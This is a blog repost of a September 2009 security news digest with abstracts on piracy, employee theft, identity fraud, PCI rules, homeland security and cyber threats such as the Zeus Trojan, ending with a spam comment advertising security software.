Friday, September 04, 2009

Security Management Weekly - September 4, 2009

header

  Learn more! ->   sm professional  

September 4, 2009
 
 
Corporate Security

Sponsored By:
  1. "Kenya: Focus Anti-Piracy War on Land, Not Sea"
  2. "Curbing Employee Theft" Although Recession has Sparked Increase in Employee Theft, Employers Can Take Several Steps to Protect Themselves
  3. "Wig-Wearer Said Part of Bernanke ID-Theft Ring" Authorities Say Member of Group Used Wigs to Impersonate ID Theft Victims and Drain Their Bank Accounts
  4. "Don't Look Now" Pending PCI DSS Rules Could Cause Problems for Internet Retailers
  5. "Workplace Bullying No Laughing Matter"
Homeland Security

Sponsored By:
  1. "How Team of Geeks Cracked the Spy Trade" California Company Introduces Application That Some Say Could be an Effective Tool in Anti-Terrorism Efforts
  2. "North Korea Prepares More Weapons Fuel"
  3. "US Inspection After Pictures of Private Security Contractors in Kabul"
  4. "Gates Says Additional Local Forces May Be Needed in Afghan War"
  5. "Ridge Backpedals on Pressure to Raise Terror Alert Level"
Cyber Security

  1. "Data Leakage Prevention Going Mainstream" Study by Nemertes Research Finds Companies Increasingly Using Data Loss Prevention Systems
  2. "Instant Messenger Speeds Up Data Theft Danger"
  3. "Keeping Your Site Out of Hackers' Clutches" Small Businesses Need to Take Steps to Prevent Their Sites From Being Used to Distribute Malware
  4. "California Security Chief Aims to Secure Social Networks, Teleworkers" Mark Weatherford
  5. "Lawmakers Strike New Tone With Proposed Bill Giving Obama Power to Shut Down Internet"

   

 
 
 

 


Kenya: Focus Anti-Piracy War on Land, Not Sea
allAfrica.com (09/03/09) Marete, Gitonga

Speakers at the Ports Management Association of Eastern and Southern Africa's workshop on maritime safety and port security, which was held Wednesday in Kenya, said that anti-piracy efforts in the waters off the coast of Somalia will not be successful until greater emphasis is placed on going after pirates on land before they get to the sea. Meanwhile, Col. Victor Gamor, the military advisor at the United Nations Political Office on Somalia, said that the large amount of firearms that are being shipped to the militias in the East African nation are making the problem of piracy worse. He called on the international community to do more to address the root causes of piracy and to adopt a comprehensive strategy to stabilize Somalia. Another speaker at the workshop, Southern African Development Community Secretariat Mapolao Mokoena, also said that all countries need to work together to deal with the problem of piracy. She noted that public and private maritime security activities should be combined into a single effort that addresses all maritime threats. Participants at the workshop, who came from more than 17 eastern and southern African nations, offered suggestions of their own for dealing with piracy, including arming crew members and providing ships with armed escorts.


Curbing Employee Theft
Human Resource Executive Online (09/02/09) Still, Sally; Lehner, Meghan

The economic recession that has gripped the nation for more than a year now has spurred an increase in employee theft, according to a report by i4cp Inc. That report found that 27 percent of respondents in companies with 10,000 or more employees have experienced an increase in workplace theft since the recession began. This theft has cost U.S. organizations roughly 7 percent of their annual revenues, a separate study by the Association of Certified Fraud Examiners found. However, few companies have responded to the growing problem by implementing more or heightened surveillance. Employers risk becoming victims of employee theft if they do not take a number of proactive steps to combat this problem. For instance, human resources departments can help make sure their organizations are hiring the right employees by using pre-employment tests designed to predict potential theft problems. Employers can also prevent theft by their employees by using cash-reconciliation forms and by separating the AP and AR positions. Finally, employers should have anti-theft policies in place that require employees to report instances of theft.


Wig-Wearer Said Part of Bernanke ID-Theft Ring
Associated Press (09/01/09)

Authorities are learning more about the identity-theft ring that stole the identities of hundreds of people in Illinois, Maryland, Virginia, and Washington, D.C., including the identity of the wife of Federal Reserve Chairman Ben Bernanke. Court documents show that the ring stole a total of more than $2.1 million from its victims. Authorities say that one of the members of the ring, 38-year-old Shonya Michelle Young of Myrtle Beach, S.C., would use one of three wigs to impersonate her victims to obtain fake IDs and cash illegal checks in order to steal all the money from their bank accounts. Authorities say Young--who was arrested Monday and has been charged with conspiracy to commit bank fraud--and other members of the ID-theft ring committed the fraud at least 10 financial institutions. Authorities also say that the suspected ringleader of the group, Clyde Austin Gray Jr. of Waldorf, Md., hired pickpockets and made fraudulent IDs for conspirators who made the illegal bank transactions. Gray is also believed to have taken a cut of the proceeds from those transactions. He pleaded guilty on charges related to his involvement in the ring in July.


Don't Look Now
Internet Retailer (09/09) Davis, Don

New PCI Data Security Standard rules scheduled to be released next year are expected to be problematic for online merchants. One of the new rules requires all payment software that manages cardholder data to comply with the Payment Application Data Security Standard, while another requires certain larger merchants to employ outside auditors for yearly evaluations. The new rules and stricter enforcement likely will force merchants into a greater reliance on technology vendors for help with PCI. A recent National Retail Federation survey found that 19 percent of non-compliant smaller merchants did not understand PCI and another 26 percent did not have the financial or technical resources to achieve compliance. SecurityMetrics executive Wenlock Free says banks have provided the company with data on an additional 1.2 million retailers, which indicates that more acquirers will be mandating PCI compliance in the years to come. PCI experts advise retailers that not holding cardholder data is one of the best strategies for lowering PCI compliance costs, because only retailer systems that hold cardholder data come under the auspices of PCI. Tokenization is another approach for ensuring that merchants hold no credit or debit card numbers. Retailers also must guarantee that their technology vendors comply with PCI requirements, an issue that is especially significant with the July 2010 deadline for payment software to be PCI-compliant.


Workplace Bullying No Laughing Matter
Nova Scotia Chronicle Herald (Canada) (08/31/09)

Bullying is an increasing problem in the workplace, with 37 percent of workers reporting having been subjected to bullying behaviors, including demeaning remarks, threats, and physical attacks, according to the Workplace Bullying Institute. Of those workers who report being victims of bullying, 40 percent say they never report the behavior to their employers. This reluctance may stem from the institute's other findings, which suggest 62 percent of employers tend to ignore bullying situations. In order to prevent bullying, employers should put in place strict policies that provide victims of bullying with a safe way to report problems and provide guidelines for appropriate action against the perpetrators. Those employees who experience bullying should be aware of these types of policies, either on a company-wide or governmental scale. They should also be educated about the right ways to confront a bully. Experts recommend interrupting the bully's actions, using the bully's name, telling the bully what effect their actions have, and recommending an alternative behavior. Some individuals may also want to inquire as to what prompted the bullying. No matter what the situation, employees who are targets of bullying should not be afraid to ask for support if they need it from a manager or co-worker when they confront a bully. If the bullying persists, employees should speak to a manager or a member of the human resources department. They should also document the bullying in preparation for filing a written complaint, if necessary. Finally, co-workers are encouraged to come to the aid of their fellow employees if they witness bullying and back up victims in their attempt to seek aid from management.




How Team of Geeks Cracked the Spy Trade
Wall Street Journal (09/04/09) Gorman, Siobhan

Silicon Valley-based Palantir Technologies has designed a new software search tool that can scan multiple sources of data at once, an advance that experts say could make it the most effective tool to investigate terrorist networks. Already, Palantir's software has helped dig up terrorist financing networks, revealed new trends in roadside bomb attacks, and uncovered the details of Syrian suicide bombing networks in Iraq. According to current and former officials it has also foiled a Pakistani suicide bombing plot on Western targets and discovered a spy infiltration of an allied government. The software is now being used by the CIA, the Pentagon, and the FBI. Palantir got its start in 2003, when Peter Thiel, the billionaire founder of PayPal, pitched an idea to the company's now CEO, Alexander Karp. The idea was to build a software that would uncover terror networks using the approach PayPal had used to track Russian cybercriminals. The two launched Palantir in 2004. Getting their software noticed by major security agencies was difficult as no one at the company had proper security clearances. The company; however, did not let the roadblocks deter them. Every other week for two years, engineers from Palantir returned to Washington with product revisions based on security analysts' requests. Finally, the final Palantir product was available, and could begin connecting various security agencies databases, a task that had previously proved daunting because information had to be collected by hand. In the past two years, Palantir's work in Washington has expanded from eight pilot programs to more than 50 projects. According to executives and officials the Australian government is now a client, and the NSA is eyeing Palantir, as is the U.K.


North Korea Prepares More Weapons Fuel
Wall Street Journal (09/04/09) P. A12; Ramstad, Evan; Solomon, Jay

In a letter sent to the United Nations Security Council on Thursday, North Korea announced that it had once again begun using spent plutonium from its nuclear power plant to build more atomic weapons. Pyongyang also noted in the letter, which was publicly released early Friday by North Korea's state-run news agency, that it was close to building atomic bombs with highly-enriched uranium. North Korea acknowledged in the letter that its move would likely result in both "dialogue and sanctions," and said that it would be forced to take "stronger self-defensive countermeasures" if U.N. member countries placed sanctions ahead of dialogue. The reclusive communist country has used similar language in the past to describe weapons tests. The U.S. State Department has not commented on the claims contained in North Korea's letter to the U.N. Security Council, though spokesman P.J. Crowley did say that Pyongyang could have "a very different future if it recommits to complete and verifiable denuclearization."


US Inspection After Pictures of Private Security Contractors in Kabul
Times Online (United Kingdom) (09/03/09) Whittell, Giles

The U.S. State Department announced Wednesday that it was sending more than a dozen investigators to Afghanistan to look into the activities of private security contractors charged with protecting the U.S. Embassy in Kabul. The announcement came shortly after the release of photos showing male contractors, who work for ArmorGroup North America, with their clothes off and dancing around fires. Other images show naked men drinking vodka and eating food off each others' bodies at the U.S. Embassy. Guards who work for ArmorGroup say the images reflect the culture of fear and coercion that exists in Kabul. They say that employees who refused to go along with the so-called hazing rituals that were depicted in the pictures were liable to be fired. The State Department has vowed to take "prompt and effective action" after the investigations into the photos are complete. However, officials say security is already in jeopardy at the Embassy because the pictures have damaged the image of U.S. forces in Afghanistan.


Gates Says Additional Local Forces May Be Needed in Afghan War
Bloomberg (08/31/09) Cook, Peter; Capaccio, Tony

Defense Secretary Robert Gates said Monday that more personnel may be needed to defeat the Taliban in Afghanistan. According to Gates, the 230,800 Afghan police and military forces that are expected to be on the ground in Afghanistan by 2011 may not be enough to make progress against the militant group. Gates' comments came the same day that Gen. Stanley McChrystal, the commander of U.S. and NATO troops in Afghanistan, sent his assessment of the war to Gen. David Petraeus, the commander of U.S. forces in the Middle East and Central Asia, and Anders Fogh Rasmussen, the secretary-general of NATO. In his assessment, McChrystal said the current situation in Afghanistan is serious but that success can be achieved if there is a stronger focus on deploying more Afghan security personnel and protecting civilians. However, the review did not provide a recommendation or request for additional U.S. troops. Rasmussen has said that he will not rule out the possibility of more troops in Afghanistan, but said that there needs to be a significant increase in the number of Afghan soldiers first. The U.S. could be forced to send more troops to support an increase in Afghan security forces, though deploying more troops could be difficult for President Obama, since public support for the Afghan War appears to be declining.


Ridge Backpedals on Pressure to Raise Terror Alert Level
USA Today (08/30/09) Hall, Mimi

Former Department of Homeland Security (DHS) chief Tom Ridge has recanted his assertions that former Secretary of Defense Donald Rumsfeld and Attorney General John Ashcroft pressured him to raise the terror alert level right before Election Day 2004. Specifically, Ridge wrote in his new book, The Test of Our Times, "Ashcroft strongly urged an increase in the threat level, and was supported by Rumsfeld. There was absolutely no support for that position within our department. None. I wondered, 'Is this about security or politics?'" A spokesman for Rumsfeld responded to the accusations, calling them "nonsense." Now, Ridge says he did not mean to suggest that he was under pressure from his colleagues to raise the threat level and he is not accusing anyone of having tried to give President Bush a last-minute boost in the polls. Ridge also attended a panel with his immediate successor Michael Chertoff to discuss possible changes to the color-coded terror alert system, which are being considered by new Homeland Security Secretary Janet Napolitano.




Data Leakage Prevention Going Mainstream
InfoWorld (09/01/09) Antonopoulos, Andreas M.

Nemertes Research's spring 2009 benchmark study finds that companies are increasingly using data loss prevention (DLP) systems, up drastically from 2007. According to Nemertes, roughly one in three companies now use some form of DLP, while DLP usage barely registered in research performed two years ago. Companies are incorporating DLP for a number of reasons, foremost being compliance. Nemertes anticipates adoption will climb from the current level of about 33 percent to almost 80 percent by 2011, with the highest rates of adoption occurring in the financial services, retail, and health care sectors. No one provider is leading the way in DLP, though distribution appears to be evenly spread among appliance-based solutions, mail and Web scanning services, and endpoint security protection.


Instant Messenger Speeds Up Data Theft Danger
IDG News Service (09/01/09) Kirk, Jeremy

A highly advanced piece of malware in circulation has been updated to allow cybercrooks to act more quickly after they have stolen information from a machine. RSA says the Zeus Trojan, which has been used in innumerable online bank thefts, now incorporates an instant messaging component that notifies hackers instantly when they have seized someone's login credentials. In its August Online Fraud Report, RSA notes that Zeus is not the first malicious Trojan to utilize instant messaging. Another login-stealing bug called Sinowal was identified to also be using it in 2008. In August, Damballa estimated the number of Zeus-infected machines in the United States alone to be approximately 3.6 million, making it one of the most ubiquitous malware programs and a massive botnet. A person may be duped into installing Zeus on a machine simply by opening an email attachment containing the malicious program.


Keeping Your Site Out of Hackers' Clutches
Wall Street Journal (09/01/09) Richmond, Riva

Because of their size, many small companies do not consider themselves potential targets for online hackers, but a growing number of small businesses are becoming victims. Hackers often use automated programs that find a flow in a piece of common software, attacking its millions of users en masse, rather than targeting specific sites. Online attackers may deposit malicious programs designed to steal data, look through databases to find valuable information, or steal credit-card numbers. San Diego-based Websense Inc. reported that, in the first half of 2009, 61 percent of the Web's top 100 sites delivered something malicious to visitors because it had been planted there by hackers. To prevent such security attacks, small businesses should make sure their online hosts are providing security. If companies manage their servers themselves, security software must be kept current and updated. Companies should use automated tools to find security flaws and bugs in custom software, or hire a security expert to assess it. Hired penetration testers can also be used to find any vulnerabilities from mistakes in site construction. Passwords should also be strong, difficult to guess, and not be provided to company outsiders.


California Security Chief Aims to Secure Social Networks, Teleworkers
Government Technology (08/31/09) Towns, Steve

In an interview, Mark Weatherford, California's chief information security officer and head of the state's Office of Information Security, discusses the strategic plan that will outline his agency's vision of cybersecurity in the state for the next five years. Weatherford notes that the plan will closely resemble the strategic plan state CIO Teri Takai released earlier this year. "We're also creating a new complement of state enterprise security policies," he says. "State agency CIOs tell me that's what would help them the most—consistent policies that let them know the direction the state is heading and what's expected of them." Weatherford also says that his agency is trying to develop a way that will allow state employees to access social networks on the job in a secure manner. "We're going to jump out in front of this and get something in place that allows state employees to use social networks," he says. "It's going to be my job to figure out how we can safely and securely implement these technologies in state agencies because in a couple of years we're not going to have this discussion anymore." In addition, Weatherford says that the Office of Information Security has been working on putting security controls and devices in place to ensure security for teleworkers. He also says the state is currently in the final stages of vetting a security standard for teleworkers.


Lawmakers Strike New Tone With Proposed Bill Giving Obama Power to Shut Down Internet
Network World (08/28/09) Fontana, John

The second draft of a U.S. Senate cybersecurity bill scales back language that would give the president the ability to shut down the Internet in an emergency. The bill, first introduced in April by Sen. John Rockefeller (D-W.Va.), would give the president the authority to direct responses to cyberattacks and declare a cyberemergency. The bill also would give the president 180 days to implement a cybersecurity strategy after the passage of the bill. The language of the first draft of the bill, which is still in Rockefeller's Senate Committee on Commerce, Science, and Transportation, was rewritten regarding the president's authority to shut down both public and private networks, including Internet traffic involving compromised systems. Critics say that giving the president widespread power over the Internet is dangerous as private networks could be shutdown by government order, and those same networks could become subject to government-mandated security standards and technical configurations. The second draft contains more detailed language concerning the president's control over computer networks, and removes some language referencing the Internet. The new bill qualifies the president's authority to include "strategic national interests involving compromised federal government or United States critical infrastructure information system or network," and says the president may direct the national response to cyberthreats by coordinating with "relevant industry sectors."


Abstracts Copyright © 2009 Information, Inc. Bethesda, MD


  ASIS also offers a daily and a non-sponsored, special-content Professional Edition of
Security Newsbriefs. Please click to see a sample or to contact us for more information.

Unsubscribe | Change E-mail | Advertising Opportunities | Security Management Online | ASIS Online

1 comment:

  1. Anonymous4:19 AM

    all-in-one suite is a tightly integrated set of advanced security layers that, together, create the most secure protection in the industry. Uniquely engineered to prevent threats from getting on a PC in the first place, it has won more major awards than any other Internet security software on the market. The suite combines the robust security features computer experts demand with automatic functions that make it simple enough for novices to use.

    ReplyDelete